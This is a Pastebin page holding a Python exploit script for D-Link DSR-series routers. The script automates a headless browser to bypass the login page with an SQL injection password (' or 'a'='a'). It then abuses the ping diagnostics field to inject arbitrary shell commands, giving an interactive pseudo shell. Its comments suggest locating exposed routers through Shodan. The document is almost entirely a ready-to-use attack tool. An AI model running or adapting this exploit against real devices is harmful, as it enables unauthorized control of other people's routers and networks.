SHARE
TWEET

login-dsr.py

0x41 May 31st, 2017 103 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # this is a router exploit for several DLink DSR devices
  2. # it opens a pseudo shell on the router
  3. # vulnerable versions are DSR-150 DSR-150N DSR-1000 DSR-1000N,as
  4. # researched by null_null ,0_o who first exploited this bug and wrote a cool
  5. # advisory on https://www.exploit-db.com/exploits/30062/, and an exploit
  6. # included.
  7. # I am taking here a slightly different approach..
  8. # make sure to find those routers ( shodan helps .. ).
  9. # apt install xvfb
  10. # pip install `all required packages in import below`
  11. # use the program like `python login.py <ip>:<port>`
  12.  
  13. from selenium import webdriver
  14. from selenium.webdriver.common.keys import Keys
  15. from selenium.webdriver.firefox.webdriver import FirefoxProfile
  16. import time
  17. import sys,os
  18. from pyvirtualdisplay import Display
  19. from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
  20. from selenium.webdriver.common.action_chains import ActionChains
  21. import easyprocess
  22.  
  23. profile = webdriver.FirefoxProfile()
  24. profile.update_preferences()
  25.  
  26. display = Display(visible=0,size=(800,600))
  27. display.start()
  28. profile.set_preference("javascript.enabled", False);
  29. #browser.set_window_size(1120, 550)
  30. browser = webdriver.Firefox(profile)
  31. browser.get("about:config")
  32. actions = ActionChains(browser)
  33. actions.send_keys(Keys.RETURN)
  34. actions.send_keys("javascript.enabled")
  35. actions.perform()
  36. actions.send_keys(Keys.TAB)
  37. actions.send_keys(Keys.RETURN)
  38. actions.send_keys(Keys.F5)
  39. actions.perform()
  40. browser.get("http://" + sys.argv[1] + "/platform.cgi")
  41. time.sleep(2)
  42. username = browser.find_element_by_id("txtUserName")
  43. password = browser.find_element_by_id("txtPwd")
  44. username.send_keys("admin")
  45. password.send_keys("' or 'a'='a")
  46. browser.find_element_by_name("button.login.Users.deviceStatus").click()
  47. time.sleep(4)
  48. #browser.get("http://" + sys.argv[1] + "/platform.cgi?page=adminSettings.htm")
  49. while True:
  50.     browser.get("http://" + sys.argv[1] + "/platform.cgi?page=systemCheck.htm")
  51.     ping_command = browser.find_element_by_id("txtIpaddr")
  52.     cmd = raw_input("cmd>")
  53.     ping_command.clear()
  54.     ping_command.send_keys(";" + cmd)
  55.     browser.find_element_by_name("button.ping.diagDisplay").click()
  56.     time.sleep(5)
  57.     print browser.page_source
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top